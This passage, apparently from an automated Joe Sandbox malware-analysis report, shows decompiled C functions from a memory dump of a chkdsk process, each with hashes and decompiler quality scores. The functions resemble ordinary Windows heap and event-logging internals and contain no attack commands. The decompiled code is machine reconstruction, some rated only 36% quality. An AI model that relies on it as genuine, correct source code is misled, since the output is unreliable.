                                                      				intOrPtr _t34;
                                                      				signed int _t35;
                                                      
                                                      				_v8 =  *0x4e7d360 ^ _t35;
                                                      				_v16 = __ecx;
                                                      				_v54 = 0x1722;
                                                      				_v24 =  *(__ecx + 0x14) & 0x00ffffff;
                                                      				_v28 =  *((intOrPtr*)(__ecx + 4));
                                                      				_v20 =  *((intOrPtr*)(__ecx + 0xc));
                                                      				if(E04DA7D50() == 0) {
                                                      					_t21 = 0x7ffe0382;
                                                      				} else {
                                                      					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x228;
                                                      				}
                                                      				_push( &_v60);
                                                      				_push(0x10);
                                                      				_push(0x20402);
                                                      				_push( *_t21 & 0x000000ff);
                                                      				return E04DCB640(E04DC9AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34);
                                                      			}

















                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.567085353.0000000004D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D60000, based on PE: true
                                                      • Associated: 0000000A.00000002.567198234.0000000004E7B000.00000040.00000800.00020000.00000000.sdmp
                                                      • Associated: 0000000A.00000002.567207274.0000000004E7F000.00000040.00000800.00020000.00000000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_4d60000_chkdsk.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 7e7cd0efdb8210b6a06ccb854b4b08400251c72fd29094711d75b36d26b8f81e
                                                      • Instruction ID: 3c7a61a48d5e94dca7bc28bf2f4d2c793a8cc943fc69429bbe11f4494a70632f
                                                      • Opcode Fuzzy Hash: 7e7cd0efdb8210b6a06ccb854b4b08400251c72fd29094711d75b36d26b8f81e
                                                      • Instruction Fuzzy Hash: E8016270A00209EFCB14DFA8D542A6EB7F4EF04314F104199A504EB392D635E901CB90
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 48%
                                                      			E04E58F6A(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
                                                      				signed int _v8;
                                                      				intOrPtr _v12;
                                                      				intOrPtr _v16;
                                                      				intOrPtr _v20;
                                                      				intOrPtr _v24;
                                                      				short _v50;
                                                      				char _v56;
                                                      				signed char* _t18;
                                                      				intOrPtr _t24;
                                                      				intOrPtr _t30;
                                                      				intOrPtr _t31;
                                                      				signed int _t32;
                                                      
                                                      				_t29 = __edx;
                                                      				_v8 =  *0x4e7d360 ^ _t32;
                                                      				_v16 = __ecx;
                                                      				_v50 = 0x1c2c;
                                                      				_v24 = _a4;
                                                      				_v20 = _a8;
                                                      				_v12 = __edx;
                                                      				if(E04DA7D50() == 0) {
                                                      					_t18 = 0x7ffe0386;
                                                      				} else {
                                                      					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                                                      				}
                                                      				_push( &_v56);
                                                      				_push(0x10);
                                                      				_push(0x402);
                                                      				_push( *_t18 & 0x000000ff);
                                                      				return E04DCB640(E04DC9AE0(), _t24, _v8 ^ _t32, _t29, _t30, _t31);
                                                      			}
















                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.567085353.0000000004D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D60000, based on PE: true
                                                      • Associated: 0000000A.00000002.567198234.0000000004E7B000.00000040.00000800.00020000.00000000.sdmp
                                                      • Associated: 0000000A.00000002.567207274.0000000004E7F000.00000040.00000800.00020000.00000000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_4d60000_chkdsk.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 001836efc3792ce8ca7ff5ce7f85df31eeab62fdf8bdec64e328a3505afbbbae
                                                      • Instruction ID: f427caf817d4605f62d18e523dd590fefd18bbd4ff4c388ee4b16b9fcb14cf9e
                                                      • Opcode Fuzzy Hash: 001836efc3792ce8ca7ff5ce7f85df31eeab62fdf8bdec64e328a3505afbbbae
                                                      • Instruction Fuzzy Hash: 3E013C74A0020DAFDB00EFA9D545AAEB7B4FF08304F10405AB905EB390EA74EA10CBA4
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 48%
                                                      			E04E4131B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
                                                      				signed int _v8;
                                                      				intOrPtr _v12;
                                                      				intOrPtr _v16;
                                                      				intOrPtr _v20;
                                                      				intOrPtr _v24;
                                                      				short _v50;
                                                      				char _v56;
                                                      				signed char* _t18;
                                                      				intOrPtr _t24;
                                                      				intOrPtr _t30;
                                                      				intOrPtr _t31;
                                                      				signed int _t32;
                                                      
                                                      				_t29 = __edx;
                                                      				_v8 =  *0x4e7d360 ^ _t32;
                                                      				_v20 = _a4;
                                                      				_v12 = _a8;
                                                      				_v24 = __ecx;
                                                      				_v16 = __edx;
                                                      				_v50 = 0x1021;
                                                      				if(E04DA7D50() == 0) {
                                                      					_t18 = 0x7ffe0380;
                                                      				} else {
                                                      					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                                      				}
                                                      				_push( &_v56);
                                                      				_push(0x10);
                                                      				_push(0x20402);
                                                      				_push( *_t18 & 0x000000ff);
                                                      				return E04DCB640(E04DC9AE0(), _t24, _v8 ^ _t32, _t29, _t30, _t31);
                                                      			}
















                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.567085353.0000000004D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D60000, based on PE: true
                                                      • Associated: 0000000A.00000002.567198234.0000000004E7B000.00000040.00000800.00020000.00000000.sdmp
                                                      • Associated: 0000000A.00000002.567207274.0000000004E7F000.00000040.00000800.00020000.00000000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_4d60000_chkdsk.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 81f22354f3175f993836d599aa1409fe544ac6775b6dc468afca8be1bec6df76
                                                      • Instruction ID: a3eb94e087dc8d3d195afa5425ee59084c0590770283b73d7ecbc4051e1e038f
                                                      • Opcode Fuzzy Hash: 81f22354f3175f993836d599aa1409fe544ac6775b6dc468afca8be1bec6df76
                                                      • Instruction Fuzzy Hash: 32013C71A01208AFDB04EFA9D545AAEB7F4FF48700F00405AF845EB381E674EA50CB54
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 46%
                                                      			E04E41608(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
                                                      				signed int _v8;
                                                      				intOrPtr _v12;
                                                      				intOrPtr _v16;
                                                      				intOrPtr _v20;
                                                      				short _v46;
                                                      				char _v52;
                                                      				signed char* _t15;
                                                      				intOrPtr _t21;
                                                      				intOrPtr _t27;
                                                      				intOrPtr _t28;
                                                      				signed int _t29;
                                                      
                                                      				_t26 = __edx;
                                                      				_v8 =  *0x4e7d360 ^ _t29;
                                                      				_v12 = _a4;
                                                      				_v20 = __ecx;
                                                      				_v16 = __edx;
                                                      				_v46 = 0x1024;
                                                      				if(E04DA7D50() == 0) {
                                                      					_t15 = 0x7ffe0380;
                                                      				} else {
                                                      					_t15 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                                      				}
                                                      				_push( &_v52);
                                                      				_push(0xc);
                                                      				_push(0x20402);
                                                      				_push( *_t15 & 0x000000ff);
                                                      				return E04DCB640(E04DC9AE0(), _t21, _v8 ^ _t29, _t26, _t27, _t28);
                                                      			}















                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.567085353.0000000004D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D60000, based on PE: true
                                                      • Associated: 0000000A.00000002.567198234.0000000004E7B000.00000040.00000800.00020000.00000000.sdmp
                                                      • Associated: 0000000A.00000002.567207274.0000000004E7F000.00000040.00000800.00020000.00000000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_4d60000_chkdsk.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 628813941983a10d00f7e827d35c3131d1745c7539b45154495926903d83be3c
                                                      • Instruction ID: 67259cc52e64fe5325b6f936d4d9b4e6e817471ec9f1ed92f9854f34d3e103a4
                                                      • Opcode Fuzzy Hash: 628813941983a10d00f7e827d35c3131d1745c7539b45154495926903d83be3c
                                                      • Instruction Fuzzy Hash: D7F06271E00248EFDB04DFA9D405EAEB7F4EF44300F044099E905EB381E634E900CB54
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 100%
                                                      			E04DAC577(void* __ecx, char _a4) {
                                                      				void* __esi;
                                                      				void* __ebp;
                                                      				void* _t17;
                                                      				void* _t19;
                                                      				void* _t20;
                                                      				void* _t21;
                                                      
                                                      				_t18 = __ecx;
                                                      				_t21 = __ecx;
                                                      				if(__ecx == 0 ||  *((char*)(__ecx + 0xdd)) != 0 || E04DAC5D5(__ecx, _t19) == 0 ||  *((intOrPtr*)(__ecx + 4)) != 0x4d611cc ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
                                                      					__eflags = _a4;
                                                      					if(__eflags != 0) {
                                                      						L10:
                                                      						E04E588F5(_t17, _t18, _t19, _t20, _t21, __eflags);
                                                      						L9:
                                                      						return 0;
                                                      					}
                                                      					__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
                                                      					if(__eflags == 0) {
                                                      						goto L10;
                                                      					}
                                                      					goto L9;
                                                      				} else {
                                                      					return 1;
                                                      				}
                                                      			}










                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.567085353.0000000004D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D60000, based on PE: true
                                                      • Associated: 0000000A.00000002.567198234.0000000004E7B000.00000040.00000800.00020000.00000000.sdmp
                                                      • Associated: 0000000A.00000002.567207274.0000000004E7F000.00000040.00000800.00020000.00000000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_4d60000_chkdsk.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 517aa6d5676633d8f625b9d4693b5775a0bc9d848255b8ce35539d703856220d
                                                      • Instruction ID: c1fe2e86b783ac90de2cbb189a5c70f7d23e7550445c21e741a6ce655c0b8e39
                                                      • Opcode Fuzzy Hash: 517aa6d5676633d8f625b9d4693b5775a0bc9d848255b8ce35539d703856220d
                                                      • Instruction Fuzzy Hash: F0F0B4B29356909FEB32DB14C04CB227BE4BB05F74F448467F45687211E7A4F8A0C651
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 43%
                                                      			E04E58D34(intOrPtr __ecx, intOrPtr __edx) {
                                                      				signed int _v8;
                                                      				intOrPtr _v12;
                                                      				intOrPtr _v16;
                                                      				short _v42;
                                                      				char _v48;
                                                      				signed char* _t12;
                                                      				intOrPtr _t18;
                                                      				intOrPtr _t24;
                                                      				intOrPtr _t25;
                                                      				signed int _t26;
                                                      
                                                      				_t23 = __edx;
                                                      				_v8 =  *0x4e7d360 ^ _t26;
                                                      				_v16 = __ecx;
                                                      				_v42 = 0x1c2b;
                                                      				_v12 = __edx;
                                                      				if(E04DA7D50() == 0) {
                                                      					_t12 = 0x7ffe0386;
                                                      				} else {
                                                      					_t12 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                                                      				}
                                                      				_push( &_v48);
                                                      				_push(8);
                                                      				_push(0x20402);
                                                      				_push( *_t12 & 0x000000ff);
                                                      				return E04DCB640(E04DC9AE0(), _t18, _v8 ^ _t26, _t23, _t24, _t25);
                                                      			}














                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.567085353.0000000004D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D60000, based on PE: true
                                                      • Associated: 0000000A.00000002.567198234.0000000004E7B000.00000040.00000800.00020000.00000000.sdmp
                                                      • Associated: 0000000A.00000002.567207274.0000000004E7F000.00000040.00000800.00020000.00000000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_4d60000_chkdsk.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 86f561b54b309ae989fd4c754719bd46d6e7307b7ff081f844b9a8734d3c8446
                                                      • Instruction ID: 010e8db506f36f6af671517fc7eca63b11da7755fddd9848824868716c83b42d
                                                      • Opcode Fuzzy Hash: 86f561b54b309ae989fd4c754719bd46d6e7307b7ff081f844b9a8734d3c8446
                                                      • Instruction Fuzzy Hash: 5BF0B470F04608AFDB04EFB9D441B6E77B8FF04304F108099E905EB290EA34E910CB64
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 94%
                                                      			E04E42073(void* __ebx, void* __ecx, void* __edi, void* __eflags) {
                                                      				void* __esi;
                                                      				signed char _t3;
                                                      				signed char _t7;
                                                      				void* _t19;
                                                      
                                                      				_t17 = __ecx;
                                                      				_t3 = E04E3FD22(__ecx);
                                                      				_t19 =  *0x4e7849c - _t3; // 0x0
                                                      				if(_t19 == 0) {
                                                      					__eflags = _t17 -  *0x4e78748; // 0x0
                                                      					if(__eflags <= 0) {
                                                      						E04E41C06();
                                                      						_t3 =  *((intOrPtr*)( *[fs:0x30] + 2));
                                                      						__eflags = _t3;
                                                      						if(_t3 != 0) {
                                                      							L5:
                                                      							__eflags =  *0x4e78724 & 0x00000004;
                                                      							if(( *0x4e78724 & 0x00000004) == 0) {
                                                      								asm("int3");
                                                      								return _t3;
                                                      							}
                                                      						} else {
                                                      							_t3 =  *0x7ffe02d4 & 0x00000003;
                                                      							__eflags = _t3 - 3;
                                                      							if(_t3 == 3) {
                                                      								goto L5;
                                                      							}
                                                      						}
                                                      					}
                                                      					return _t3;
                                                      				} else {
                                                      					_t7 =  *0x4e78724; // 0x0
                                                      					return E04E38DF1(__ebx, 0xc0000374, 0x4e75890, __edi, __ecx,  !_t7 >> 0x00000002 & 0x00000001,  !_t7 >> 0x00000002 & 0x00000001);
                                                      				}
                                                      			}








                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.567085353.0000000004D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D60000, based on PE: true
                                                      • Associated: 0000000A.00000002.567198234.0000000004E7B000.00000040.00000800.00020000.00000000.sdmp
                                                      • Associated: 0000000A.00000002.567207274.0000000004E7F000.00000040.00000800.00020000.00000000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_4d60000_chkdsk.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 002d04f06f2eb6c77f256a8b1cc34ed552c6b1d7472e4f9727910e45d86c385b
                                                      • Instruction ID: 87612176d751ad9f12ee1a4e1b80b2ba394bf6ca4f1774062b845877a7cc2667
                                                      • Opcode Fuzzy Hash: 002d04f06f2eb6c77f256a8b1cc34ed552c6b1d7472e4f9727910e45d86c385b
                                                      • Instruction Fuzzy Hash: A1F027264211844BEF36BF2630093D16BD0EBD51ADF0934C5E55057204C57CBC83CB10
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 54%
                                                      			E04DC927A(void* __ecx) {
                                                      				signed int _t11;
                                                      				void* _t14;
                                                      
                                                      				_t11 = L04DA4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x98);
                                                      				if(_t11 != 0) {
                                                      					E04DCFA60(_t11, 0, 0x98);
                                                      					asm("movsd");
                                                      					asm("movsd");
                                                      					asm("movsd");
                                                      					asm("movsd");
                                                      					 *(_t11 + 0x1c) =  *(_t11 + 0x1c) & 0x00000000;
                                                      					 *((intOrPtr*)(_t11 + 0x24)) = 1;
                                                      					E04DC92C6(_t11, _t14);
                                                      				}
                                                      				return _t11;
                                                      			}






                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.567085353.0000000004D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D60000, based on PE: true
                                                      • Associated: 0000000A.00000002.567198234.0000000004E7B000.00000040.00000800.00020000.00000000.sdmp
                                                      • Associated: 0000000A.00000002.567207274.0000000004E7F000.00000040.00000800.00020000.00000000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_4d60000_chkdsk.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: fb98b62dac83db7e13ee253788b92f70b835eb404f2827a387eedf494df67516
                                                      • Instruction ID: b2c780c80c0fee15e92846aa93f40cf47242b6ef7040a0e2264e1d7b4e15ccd4
                                                      • Opcode Fuzzy Hash: fb98b62dac83db7e13ee253788b92f70b835eb404f2827a387eedf494df67516
                                                      • Instruction Fuzzy Hash: 58E0ED723406016BFB219F4ACC80F43B6A9EF82724F0440BCB9005F282CAE6E80987A0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 36%
                                                      			E04E58CD6(intOrPtr __ecx) {
                                                      				signed int _v8;
                                                      				intOrPtr _v12;
                                                      				short _v38;
                                                      				char _v44;
                                                      				signed char* _t11;
                                                      				intOrPtr _t17;
                                                      				intOrPtr _t22;
                                                      				intOrPtr _t23;
                                                      				intOrPtr _t24;
                                                      				signed int _t25;
                                                      
                                                      				_v8 =  *0x4e7d360 ^ _t25;
                                                      				_v12 = __ecx;
                                                      				_v38 = 0x1c2d;
                                                      				if(E04DA7D50() == 0) {
                                                      					_t11 = 0x7ffe0386;
                                                      				} else {
                                                      					_t11 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                                                      				}
                                                      				_push( &_v44);
                                                      				_push(0xffffffe4);
                                                      				_push(0x402);
                                                      				_push( *_t11 & 0x000000ff);
                                                      				return E04DCB640(E04DC9AE0(), _t17, _v8 ^ _t25, _t22, _t23, _t24);
                                                      			}














                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.567085353.0000000004D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D60000, based on PE: true
                                                      • Associated: 0000000A.00000002.567198234.0000000004E7B000.00000040.00000800.00020000.00000000.sdmp
                                                      • Associated: 0000000A.00000002.567207274.0000000004E7F000.00000040.00000800.00020000.00000000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_4d60000_chkdsk.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 3eeb3e603fe4d41362d1df03dcd3d86cb69027fdc9a2c14d0eff8b2697e10bcd
                                                      • Instruction ID: e4e5d681ffa58dd0178eaa0705f26b9d319fdab2cc458d148351f42e996432c4
                                                      • Opcode Fuzzy Hash: 3eeb3e603fe4d41362d1df03dcd3d86cb69027fdc9a2c14d0eff8b2697e10bcd
                                                      • Instruction Fuzzy Hash: E8F08970A04109EBDB04EBA9D945E6E77B8EF04304F100199E915EB290E934E910C754
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 88%
                                                      			E04DA746D(short* __ebx, void* __ecx, void* __edi, intOrPtr __esi) {
                                                      				signed int _t8;
                                                      				void* _t10;
                                                      				short* _t17;
                                                      				void* _t19;
                                                      				intOrPtr _t20;
                                                      				void* _t21;
                                                      
                                                      				_t20 = __esi;
                                                      				_t19 = __edi;
                                                      				_t17 = __ebx;
                                                      				if( *((char*)(_t21 - 0x25)) != 0) {
                                                      					if(__ecx == 0) {
                                                      						E04D9EB70(__ecx, 0x4e779a0);
                                                      					} else {
                                                      						asm("lock xadd [ecx], eax");
                                                      						if((_t8 | 0xffffffff) == 0) {
                                                      							_push( *((intOrPtr*)(__ecx + 4)));
                                                      							E04DC95D0();
                                                      							L04DA77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *((intOrPtr*)(_t21 - 0x50)));
                                                      							_t17 =  *((intOrPtr*)(_t21 - 0x2c));
                                                      							_t20 =  *((intOrPtr*)(_t21 - 0x3c));
                                                      						}
                                                      					}
                                                      					L10:
                                                      				}
                                                      				_t10 = _t19 + _t19;
                                                      				if(_t20 >= _t10) {
                                                      					if(_t19 != 0) {
                                                      						 *_t17 = 0;
                                                      						return 0;
                                                      					}
                                                      				}
                                                      				return _t10;
                                                      				goto L10;
                                                      			}










                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.567085353.0000000004D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D60000, based on PE: true
                                                      • Associated: 0000000A.00000002.567198234.0000000004E7B000.00000040.00000800.00020000.00000000.sdmp
                                                      • Associated: 0000000A.00000002.567207274.0000000004E7F000.00000040.00000800.00020000.00000000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_4d60000_chkdsk.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 374ab5a2512981516a9de3a53e476940aa137a098c95cb7fda088b069165e906
                                                      • Instruction ID: f48e307fb67df48bc0b9d7cd6935928cff732ad592937cbaddb7656502e46bbb
                                                      • Opcode Fuzzy Hash: 374ab5a2512981516a9de3a53e476940aa137a098c95cb7fda088b069165e906
                                                      • Instruction Fuzzy Hash: F5F0BE34B01244EAEF01EB68C840B7ABBA1BF04318F040259D8D1AB160F7A5F820CB95
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 100%
                                                      			E04D84F2E(void* __ecx, char _a4) {
                                                      				void* __esi;
                                                      				void* __ebp;
                                                      				void* _t17;
                                                      				void* _t19;
                                                      				void* _t20;
                                                      				void* _t21;
                                                      
                                                      				_t18 = __ecx;
                                                      				_t21 = __ecx;
                                                      				if(__ecx == 0) {
                                                      					L6:
                                                      					__eflags = _a4;
                                                      					if(__eflags != 0) {
                                                      						L8:
                                                      						E04E588F5(_t17, _t18, _t19, _t20, _t21, __eflags);
                                                      						L9:
                                                      						return 0;
                                                      					}
                                                      					__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
                                                      					if(__eflags != 0) {
                                                      						goto L9;
                                                      					}
                                                      					goto L8;
                                                      				}
                                                      				_t18 = __ecx + 0x30;
                                                      				if(E04DAC5D5(__ecx + 0x30, _t19) == 0 ||  *((intOrPtr*)(__ecx + 0x34)) != 0x4d61030 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
                                                      					goto L6;
                                                      				} else {
                                                      					return 1;
                                                      				}
                                                      			}










                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.567085353.0000000004D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D60000, based on PE: true
                                                      • Associated: 0000000A.00000002.567198234.0000000004E7B000.00000040.00000800.00020000.00000000.sdmp
                                                      • Associated: 0000000A.00000002.567207274.0000000004E7F000.00000040.00000800.00020000.00000000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_4d60000_chkdsk.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: a340ab952355ca0ae18d99f7cdf9d963d6f344dc7878ab1e61b6d10c6aa896c8
                                                      • Instruction ID: e2477b44d1a863af928c25b74b608efeab6f2aa14908db7ca28051da21406b96
                                                      • Opcode Fuzzy Hash: a340ab952355ca0ae18d99f7cdf9d963d6f344dc7878ab1e61b6d10c6aa896c8
                                                      • Instruction Fuzzy Hash: 40F0E2326256A48FE772EB19C184B33B7E4FB007B8F445465D40587A21D7B4FC44C660
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 36%
                                                      			E04E58B58(intOrPtr __ecx) {
                                                      				signed int _v8;
                                                      				intOrPtr _v20;
                                                      				short _v46;
                                                      				char _v52;
                                                      				signed char* _t11;
                                                      				intOrPtr _t17;
                                                      				intOrPtr _t22;
                                                      				intOrPtr _t23;
                                                      				intOrPtr _t24;
                                                      				signed int _t25;
                                                      
                                                      				_v8 =  *0x4e7d360 ^ _t25;
                                                      				_v20 = __ecx;
                                                      				_v46 = 0x1c26;
                                                      				if(E04DA7D50() == 0) {
                                                      					_t11 = 0x7ffe0386;
                                                      				} else {
                                                      					_t11 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                                                      				}
                                                      				_push( &_v52);
                                                      				_push(4);
                                                      				_push(0x402);
                                                      				_push( *_t11 & 0x000000ff);
                                                      				return E04DCB640(E04DC9AE0(), _t17, _v8 ^ _t25, _t22, _t23, _t24);
                                                      			}














                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.567085353.0000000004D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D60000, based on PE: true
                                                      • Associated: 0000000A.00000002.567198234.0000000004E7B000.00000040.00000800.00020000.00000000.sdmp
                                                      • Associated: 0000000A.00000002.567207274.0000000004E7F000.00000040.00000800.00020000.00000000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_4d60000_chkdsk.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 67db3351d29ff4257de8b4f21307f59fe144f5630ef7750b880c04b0249aa2c7
                                                      • Instruction ID: 7db24a124df38760b7586e4aca32d245be22ff4a7ca7325d879dd6b8e3c800ad
                                                      • Opcode Fuzzy Hash: 67db3351d29ff4257de8b4f21307f59fe144f5630ef7750b880c04b0249aa2c7
                                                      • Instruction Fuzzy Hash: 76F082B0B04259ABEB00EBA9D906E7E73B8FF04304F040499B905EB391EA74E910C7A4
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 100%
                                                      			E04DBA44B(signed int __ecx) {
                                                      				intOrPtr _t13;
                                                      				signed int _t15;
                                                      				signed int* _t16;
                                                      				signed int* _t17;
                                                      
                                                      				_t13 =  *0x4e77b9c; // 0x0
                                                      				_t15 = __ecx;
                                                      				_t16 = L04DA4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t13 + 0xc0000, 8 + __ecx * 4);
                                                      				if(_t16 == 0) {
                                                      					return 0;
                                                      				}
                                                      				 *_t16 = _t15;
                                                      				_t17 =  &(_t16[2]);
                                                      				E04DCFA60(_t17, 0, _t15 << 2);
                                                      				return _t17;
                                                      			}








                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.567085353.0000000004D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D60000, based on PE: true
                                                      • Associated: 0000000A.00000002.567198234.0000000004E7B000.00000040.00000800.00020000.00000000.sdmp
                                                      • Associated: 0000000A.00000002.567207274.0000000004E7F000.00000040.00000800.00020000.00000000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_4d60000_chkdsk.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 9c6d9483924af2981d5b30cf0d0061bc2d1384312b0a9aec3c8bd1f48ff787e4
                                                      • Instruction ID: ccf68bc4dd81aa7ddb51eb2714d7203aaa0603d033251d5adca865a939d1cd02
                                                      • Opcode Fuzzy Hash: 9c6d9483924af2981d5b30cf0d0061bc2d1384312b0a9aec3c8bd1f48ff787e4
                                                      • Instruction Fuzzy Hash: 81E09272B01421ABD2119B59AC00FA6B39EEBD4655F094039E549C7254D668ED11CBE0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 79%
                                                      			E04D8F358(void* __ecx, signed int __edx) {
                                                      				char _v8;
                                                      				signed int _t9;
                                                      				void* _t20;
                                                      
                                                      				_push(__ecx);
                                                      				_t9 = 2;
                                                      				_t20 = 0;
                                                      				if(E04DBF3D5( &_v8, _t9 * __edx, _t9 * __edx >> 0x20) >= 0 && _v8 != 0) {
                                                      					_t20 = L04DA4620( &_v8,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v8);
                                                      				}
                                                      				return _t20;
                                                      			}







                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.567085353.0000000004D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D60000, based on PE: true
                                                      • Associated: 0000000A.00000002.567198234.0000000004E7B000.00000040.00000800.00020000.00000000.sdmp
                                                      • Associated: 0000000A.00000002.567207274.0000000004E7F000.00000040.00000800.00020000.00000000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_4d60000_chkdsk.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 61dda8323ae8c861ea8f02d60a1be81a40b0a62d8b7407e3baae4fe75ca8acd3
                                                      • Instruction ID: d4941975daf4aa6dbc3e481d9e4de4e7af6d8e3f6f333b09a61eb8eabd54c1d1
                                                      • Opcode Fuzzy Hash: 61dda8323ae8c861ea8f02d60a1be81a40b0a62d8b7407e3baae4fe75ca8acd3
                                                      • Instruction Fuzzy Hash: EAE0D832A40218FBDF31A7DA9D05FAABBACDB44B60F040159F904D7150D561AD00C6D0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 100%
                                                      			E04D9FF60(intOrPtr _a4) {
                                                      				void* __ecx;
                                                      				void* __ebp;
                                                      				void* _t13;
                                                      				intOrPtr _t14;
                                                      				void* _t15;
                                                      				void* _t16;
                                                      				void* _t17;
                                                      
                                                      				_t14 = _a4;
